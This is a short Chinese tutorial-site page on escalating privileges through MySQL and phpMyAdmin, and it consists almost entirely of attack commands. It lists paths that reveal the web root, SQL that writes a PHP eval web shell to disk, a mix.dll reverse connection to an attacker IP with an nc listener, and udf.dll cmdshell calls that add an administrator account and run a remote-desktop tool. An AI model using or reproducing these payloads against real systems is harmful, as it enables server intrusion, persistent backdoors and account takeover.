盘绰网教程:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

Mysql+PHPmyadmin 提权技巧

时间:2024/1/30作者:未知来源:盘绰网教程人气:


[摘要]1:phpmyadmin 后台拿webshell phpmyadmin爆路径方法: weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php...

1:phpmyadmin 后台拿webshell

phpmyadmin爆路径方法:

weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php

http://url/phpmyadmin/libraries/select_lang.lib.php 

pphpmyadmin/libraries/export/xls.php 

hpmyadmin\themes\darkblue_orange\layout.inc.php 

D:\usr\www\html\phpMyAdmin\

----start code---

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');

select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';

Drop TABLE IF EXISTS a;

----end code---

2:mix.dll提权

D:/usr/www/html/mix.dll

mysql -h 目标ip -uroot -p

\. c:\mysql.txt

select Mixconnect('反弹ip','端口');

nc -vv -l -p 1983

3:udf.dll提权

create function cmdshell returns string soname 'udf.dll'

select cmdshell('net user user password /add'); 

select cmdshell('net localgroup administrators user /add'); 

select cmdshell('c:\3389.exe'); 

drop function cmdshell;  删除函数

select cmdshell('netstat -an');

load data infile "d:\\www\\gb\\about\\about.htm" into table tmp;

判断文件存不存在mysql的语句

 


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。

关键词:  Mysql+PHPmyadmin  提权技巧





Copyright © 2012-2018 盘绰网教程(http://www.panchuo.com) .All Rights Reserved 网站地图 友情链接

免责声明:本站资源均来自互联网收集 如有侵犯到您利益的地方请及时联系管理删除,敬请见谅!

QQ:1006262270   邮箱:kfyvi376850063@126.com   手机版